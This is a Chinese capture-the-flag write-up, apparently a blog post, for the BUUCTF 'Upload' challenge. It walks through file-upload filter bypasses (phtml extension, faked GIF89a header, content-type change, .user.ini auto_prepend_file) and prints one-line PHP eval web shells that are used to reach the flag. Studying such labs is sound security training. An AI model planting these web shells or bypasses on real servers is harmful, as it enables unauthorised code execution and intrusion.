BUUCTF: [极客大挑战 2019]Upload

BUUCTF: [极客大挑战 2019]Upload

本文知识点:

文件上传漏洞的基本思路就是上传一个可以被解析的对应引擎(如php引擎)解析的文件,然后访问这个文件,由于这个文件是我们上传的,因此我们能够控制他的行为,达到我们的目的。比如最简单的一句话木马<?=eval($_POST['cmd'])?>

  1. 当php文件的后缀被过滤的时候,还可以尝试的选择有**php1、php2、php3、phtml、ashx,本题使用到了phtml,简单来说这个就是一个包含php脚本的html文件**!

  2. 回顾文件上传漏洞(攻防世界 easyupload)

  • 伪造JEPG 文件的文件头部GIF89a! 绕过文件头部的检查

  • 这个题目不能上传php,但是他保存文件的路径下本身就存在php文件。因此可以考虑使用.user.ini文件将我们上传的文件包含到他自身的php文件中,具体的配置是auto_prepend_file=xxx.jpg

题目描述

本题就只有一个文件上传的界面,如下:

初步尝试

尝试上传木马文件

沿着做攻防世界 easyupload的方式,我先尝试将包含jepg文件头部的一句话木马文件上传, 其文件的内容如下:

bash 复制代码
GIF89a
<?=eval($_GET['test'])?>

发现上传的文件不仅文件的头部被检查了,文件的内容也被检查了,不能包含<?,其返回的结果如下:

这里后续经过多次测试,我们可以上传phtml的文件进行文件上传的绕过

文件的内容如下:

phtml 复制代码
GIF89a
<script language="php">eval($_POST['a']);</script>

这里需要修改下传递过去的文件的content-type的值,不然后端的检查无法绕过,具体如下:


尝试寻找文件的路径

上传一张正常的文件,看看文件的路径是否能反馈回来,发现其没有返回具体路径,结果如下:

我手动尝试了几个路径,前两个路径都不能访问对应的图片,最后一个能够访问到我们上传的文件,也就是文件的保存路径应该是upload/xxx。后续我们能够通过访问这个路径执行我们的代码。

bash 复制代码
http://37e01617-0c42-4e09-a905-84df951fd53f.node5.buuoj.cn:81/upload_file/Snipaste.jpg
http://37e01617-0c42-4e09-a905-84df951fd53f.node5.buuoj.cn:81/Snipaste.jpg
http://37e01617-0c42-4e09-a905-84df951fd53f.node5.buuoj.cn:81/upload/Snipaste.jpg

访问病毒文件,并传递我们需要的参数!!!

如下图,我们传递的文件的参数,但是并没有返回任何数据!

这里就是自己粗心导致的,由于我们传递过去的是php代码,放入eval函数中进行执行的,因此一定要记得分号;!!!再次尝试,结果如下:

发现如下的文件很可疑:

查看下文件的内容,得到flag,结果如下所示:

相关推荐
We་ct6 分钟前
LeetCode 172. 阶乘后的零:从暴力到最优,拆解解题核心
开发语言·前端·javascript·算法·leetcode·typescript
军军君016 分钟前
数字孪生监控大屏实战模板:可视化数字统计展示
前端·javascript·vue.js·typescript·echarts·数字孪生·前端大屏
此刻觐神14 分钟前
IMX6ULL开发板学习-03(Linux文件相关命令)
前端·chrome
吴声子夜歌30 分钟前
ES6——Iterator和for...of循环详解
前端·javascript·es6
小李子呢021134 分钟前
前端八股3---ref和reactive
开发语言·前端·javascript
落魄江湖行38 分钟前
基础篇三 Nuxt4 组件进阶:插槽与事件传递
前端·nuxt4
kerli39 分钟前
Compose 组件:LazyColumn 核心参数与 key/contentType 详解
android·前端
好运的阿财40 分钟前
“锟斤拷”问题——程序中用powershell执行命令出现中文乱码的解决办法
linux·前端·人工智能·机器学习·架构·编辑器·vim
cyber_两只龙宝41 分钟前
【Nginx】Nginx实现FastCGI详解
linux·运维·nginx·云原生·php·memcached·fastcgi
dog25041 分钟前
卡瓦列里积分赏析
开发语言·php